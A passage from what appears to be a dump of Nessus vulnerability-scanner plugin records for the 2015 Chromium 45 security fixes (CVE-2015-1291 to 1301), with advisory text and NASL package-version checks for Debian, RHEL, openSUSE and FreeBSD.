script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"chromedriver\", reference:\"45.0.2454.85-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"chromium\", reference:\"45.0.2454.85-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"chromium-dbg\", reference:\"45.0.2454.85-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"chromium-inspector\", reference:\"45.0.2454.85-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"chromium-l10n\", reference:\"45.0.2454.85-1~deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-31T20:09:24", "description": "Updated chromium-browser packages that fix multiple security issues\nare now available for Red Hat Enterprise Linux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nSeveral flaws were found in the processing of malformed web content. A\nweb page containing malicious content could cause Chromium to crash\nor, potentially, execute arbitrary code with the privileges of the\nuser running Chromium. (CVE-2015-1291, CVE-2015-1292, CVE-2015-1293,\nCVE-2015-1294, CVE-2015-1295, CVE-2015-1296, CVE-2015-1297,\nCVE-2015-1298, CVE-2015-1299, CVE-2015-1300, CVE-2015-1301)\n\nAll Chromium users should upgrade to these updated packages, which\ncontain Chromium version 45.0.2454.85, which corrects these issues.\nAfter installing the update, Chromium must be restarted for the\nchanges to take effect.", "edition": 19, "published": "2015-09-17T00:00:00", "title": "RHEL 6 : chromium-browser (RHSA-2015:1712)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1301", "CVE-2015-1291", "CVE-2015-1297", "CVE-2015-1298", "CVE-2015-1295", "CVE-2015-1296", "CVE-2015-1300", "CVE-2015-1293", "CVE-2015-1294", "CVE-2015-1292", "CVE-2015-1299"], "modified": "2015-09-17T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo", "cpe:/o:redhat:enterprise_linux:6.7", "p-cpe:/a:redhat:enterprise_linux:chromium-browser", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2015-1712.NASL", "href": "https://www.tenable.com/plugins/nessus/85974", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:1712. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(85974);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/29\");\n\n script_cve_id(\"CVE-2015-1291\", \"CVE-2015-1292\", \"CVE-2015-1293\", \"CVE-2015-1294\", \"CVE-2015-1295\", \"CVE-2015-1296\", \"CVE-2015-1297\", \"CVE-2015-1298\", \"CVE-2015-1299\", \"CVE-2015-1300\", \"CVE-2015-1301\");\n script_xref(name:\"RHSA\", value:\"2015:1712\");\n\n script_name(english:\"RHEL 6 : chromium-browser (RHSA-2015:1712)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Updated chromium-browser packages that fix multiple security issues\nare now available for Red Hat Enterprise Linux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nSeveral flaws were found in the processing of malformed web content. A\nweb page containing malicious content could cause Chromium to crash\nor, potentially, execute arbitrary code with the privileges of the\nuser running Chromium. (CVE-2015-1291, CVE-2015-1292, CVE-2015-1293,\nCVE-2015-1294, CVE-2015-1295, CVE-2015-1296, CVE-2015-1297,\nCVE-2015-1298, CVE-2015-1299, CVE-2015-1300, CVE-2015-1301)\n\nAll Chromium users should upgrade to these updated packages, which\ncontain Chromium version 45.0.2454.85, which corrects these issues.\nAfter installing the update, Chromium must be restarted for the\nchanges to take effect.\"\n );\n # http://googlechromereleases.blogspot.com/2015/09/stable-channel-update.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?96b510c5\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:1712\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1295\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1294\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1297\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1296\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1291\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1301\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1293\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1292\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1300\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1299\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1298\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected chromium-browser and / or\nchromium-browser-debuginfo packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/09/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/09/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/09/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:1712\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"chromium-browser-45.0.2454.85-2.el6\", allowmaj:TRUE)) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-45.0.2454.85-2.el6\", allowmaj:TRUE)) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"chromium-browser-debuginfo-45.0.2454.85-2.el6\", allowmaj:TRUE)) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-debuginfo-45.0.2454.85-2.el6\", allowmaj:TRUE)) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium-browser / chromium-browser-debuginfo\");\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T12:28:45", "description": "Chromium was updated to the 45.0.2454.85 of the stable channel to fix\nmultiple security issues.\n\nThe following vulnerabilities were fixed :\n\n - CVE-2015-1291: Cross-origin bypass in DOM\n\n - CVE-2015-1292: Cross-origin bypass in ServiceWorker\n\n - CVE-2015-1293: Cross-origin bypass in DOM\n\n - CVE-2015-1294: Use-after-free in Skia\n\n - CVE-2015-1295: Use-after-free in Printing\n\n - CVE-2015-1296: Character spoofing in omnibox\n\n - CVE-2015-1297: Permission scoping error in WebRequest\n\n - CVE-2015-1298: URL validation error in extensions\n\n - CVE-2015-1299: Use-after-free in Blink\n\n - CVE-2015-1300: Information leak in Blink\n\n - CVE-2015-1301: Various fixes from internal audits,\n fuzzing and other initiatives.", "edition": 17, "published": "2015-09-22T00:00:00", "title": "openSUSE Security Update : Chromium (openSUSE-2015-595)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1301", "CVE-2015-1291", "CVE-2015-1297", "CVE-2015-1298", "CVE-2015-1295", "CVE-2015-1296", "CVE-2015-1300", "CVE-2015-1293", "CVE-2015-1294", "CVE-2015-1292", "CVE-2015-1299"], "modified": "2015-09-22T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:chromedriver-debuginfo", "p-cpe:/a:novell:opensuse:chromium-desktop-gnome", "p-cpe:/a:novell:opensuse:chromium", "p-cpe:/a:novell:opensuse:chromium-debugsource", "p-cpe:/a:novell:opensuse:chromedriver", "p-cpe:/a:novell:opensuse:chromium-ffmpegsumo", "cpe:/o:novell:opensuse:13.2", "p-cpe:/a:novell:opensuse:chromium-debuginfo", "cpe:/o:novell:opensuse:13.1", "p-cpe:/a:novell:opensuse:chromium-ffmpegsumo-debuginfo", "p-cpe:/a:novell:opensuse:chromium-desktop-kde"], "id": "OPENSUSE-2015-595.NASL", "href": "https://www.tenable.com/plugins/nessus/86056", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-595.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(86056);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-1291\", \"CVE-2015-1292\", \"CVE-2015-1293\", \"CVE-2015-1294\", \"CVE-2015-1295\", \"CVE-2015-1296\", \"CVE-2015-1297\", \"CVE-2015-1298\", \"CVE-2015-1299\", \"CVE-2015-1300\", \"CVE-2015-1301\");\n\n script_name(english:\"openSUSE Security Update : Chromium (openSUSE-2015-595)\");\n script_summary(english:\"Check for the openSUSE-2015-595 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Chromium was updated to the 45.0.2454.85 of the stable channel to fix\nmultiple security issues.\n\nThe following vulnerabilities were fixed :\n\n - CVE-2015-1291: Cross-origin bypass in DOM\n\n - CVE-2015-1292: Cross-origin bypass in ServiceWorker\n\n - CVE-2015-1293: Cross-origin bypass in DOM\n\n - CVE-2015-1294: Use-after-free in Skia\n\n - CVE-2015-1295: Use-after-free in Printing\n\n - CVE-2015-1296: Character spoofing in omnibox\n\n - CVE-2015-1297: Permission scoping error in WebRequest\n\n - CVE-2015-1298: URL validation error in extensions\n\n - CVE-2015-1299: Use-after-free in Blink\n\n - CVE-2015-1300: Information leak in Blink\n\n - CVE-2015-1301: Various fixes from internal audits,\n fuzzing and other initiatives.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=944144\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected Chromium packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-desktop-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-desktop-kde\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-ffmpegsumo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-ffmpegsumo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/09/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1|SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1 / 13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromedriver-45.0.2454.85-98.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromedriver-debuginfo-45.0.2454.85-98.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-45.0.2454.85-98.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-debuginfo-45.0.2454.85-98.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-debugsource-45.0.2454.85-98.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-desktop-gnome-45.0.2454.85-98.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-desktop-kde-45.0.2454.85-98.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-ffmpegsumo-45.0.2454.85-98.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-ffmpegsumo-debuginfo-45.0.2454.85-98.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromedriver-45.0.2454.85-43.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromedriver-debuginfo-45.0.2454.85-43.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-45.0.2454.85-43.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-debuginfo-45.0.2454.85-43.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-debugsource-45.0.2454.85-43.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-desktop-gnome-45.0.2454.85-43.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-desktop-kde-45.0.2454.85-43.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-ffmpegsumo-45.0.2454.85-43.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-ffmpegsumo-debuginfo-45.0.2454.85-43.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromedriver-debuginfo / chromium / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:48:58", "description": "Google Chrome Releases reports :\n\n29 security fixes in this release, including :\n\n- [516377] High CVE-2015-1291: Cross-origin bypass in DOM. Credit to\nanonymous.\n\n- [522791] High CVE-2015-1292: Cross-origin bypass in ServiceWorker.\nCredit to Mariusz Mlynski.\n\n- [524074] High CVE-2015-1293: Cross-origin bypass in DOM. Credit to\nMariusz Mlynski.\n\n- [492263] High CVE-2015-1294: Use-after-free in Skia. Credit to\ncloudfuzzer.\n\n- [502562] High CVE-2015-1295: Use-after-free in Printing. Credit to\nanonymous.\n\n- [421332] High CVE-2015-1296: Character spoofing in omnibox. Credit\nto zcorpan.\n\n- [510802] Medium CVE-2015-1297: Permission scoping error in\nWebrequest. Credit to Alexander Kashev.\n\n- [518827] Medium CVE-2015-1298: URL validation error in extensions.\nCredit to Rob Wu.\n\n- [416362] Medium CVE-2015-1299: Use-after-free in Blink. Credit to\ntaro.suzuki.dev.\n\n- [511616] Medium CVE-2015-1300: Information leak in Blink. Credit to\ncgvwzq.\n\n- [526825] CVE-2015-1301: Various fixes from internal audits, fuzzing\nand other initiatives.", "edition": 22, "published": "2015-09-03T00:00:00", "title": "FreeBSD : chromium -- multiple vulnerabilities (a9350df8-5157-11e5-b5c1-e8e0b747a45a)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1301", "CVE-2015-1291", "CVE-2015-1297", "CVE-2015-1298", "CVE-2015-1295", "CVE-2015-1296", "CVE-2015-1300", "CVE-2015-1293", "CVE-2015-1294", "CVE-2015-1292", "CVE-2015-1299"], "modified": "2015-09-03T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:chromium-npapi", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:chromium-pulse", "p-cpe:/a:freebsd:freebsd:chromium"], "id": "FREEBSD_PKG_A9350DF8515711E5B5C1E8E0B747A45A.NASL", "href": "https://www.tenable.com/plugins/nessus/85758", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85758);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-1291\", \"CVE-2015-1292\", \"CVE-2015-1293\", \"CVE-2015-1294\", \"CVE-2015-1295\", \"CVE-2015-1296\", \"CVE-2015-1297\", \"CVE-2015-1298\", \"CVE-2015-1299\", \"CVE-2015-1300\", \"CVE-2015-1301\");\n\n script_name(english:\"FreeBSD : chromium -- multiple vulnerabilities (a9350df8-5157-11e5-b5c1-e8e0b747a45a)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Google Chrome Releases reports :\n\n29 security fixes in this release, including :\n\n- [516377] High CVE-2015-1291: Cross-origin bypass in DOM. Credit to\nanonymous.\n\n- [522791] High CVE-2015-1292: Cross-origin bypass in ServiceWorker.\nCredit to Mariusz Mlynski.\n\n- [524074] High CVE-2015-1293: Cross-origin bypass in DOM. Credit to\nMariusz Mlynski.\n\n- [492263] High CVE-2015-1294: Use-after-free in Skia. Credit to\ncloudfuzzer.\n\n- [502562] High CVE-2015-1295: Use-after-free in Printing. Credit to\nanonymous.\n\n- [421332] High CVE-2015-1296: Character spoofing in omnibox. Credit\nto zcorpan.\n\n- [510802] Medium CVE-2015-1297: Permission scoping error in\nWebrequest. Credit to Alexander Kashev.\n\n- [518827] Medium CVE-2015-1298: URL validation error in extensions.\nCredit to Rob Wu.\n\n- [416362] Medium CVE-2015-1299: Use-after-free in Blink. Credit to\ntaro.suzuki.dev.\n\n- [511616] Medium CVE-2015-1300: Information leak in Blink. Credit to\ncgvwzq.\n\n- [526825] CVE-2015-1301: Various fixes from internal audits, fuzzing\nand other initiatives.\"\n );\n # http://googlechromereleases.blogspot.nl\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://chromereleases.googleblog.com/\"\n );\n # https://vuxml.freebsd.org/freebsd/a9350df8-5157-11e5-b5c1-e8e0b747a45a.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4b8b7c5d\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium-npapi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium-pulse\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/09/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/09/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/09/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"chromium<45.0.2454.85\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"chromium-npapi<45.0.2454.85\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"chromium-pulse<45.0.2454.85\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-01T03:19:03", "description": "The version of Google Chrome installed on the remote Windows host is\nprior to 45.0.2454.85. It is, therefore, affected by multiple\nvulnerabilities :\n\n - A cross-origin bypass vulnerability exists due to a flaw\n in the ContainerNode::parserRemoveChild() function in \n ContainerNode.cpp wherein user scripts may unexpectedly\n run in 'onunload' handlers during Document Object Model\n (DOM) modification. A remote attacker can exploit this,\n via a specially crafted web page, to bypass cross-origin\n restrictions. (CVE-2015-1291)\n\n - A cross-origin bypass vulnerability exists due to a flaw\n in the LocalDOMWindow::navigator() function in\n LocalDOMWindow.cpp wherein an incorrect navigator\n associated with a frame may be returned. A remote\n attacker can exploit this, via a specially crafted web\n page, to bypass 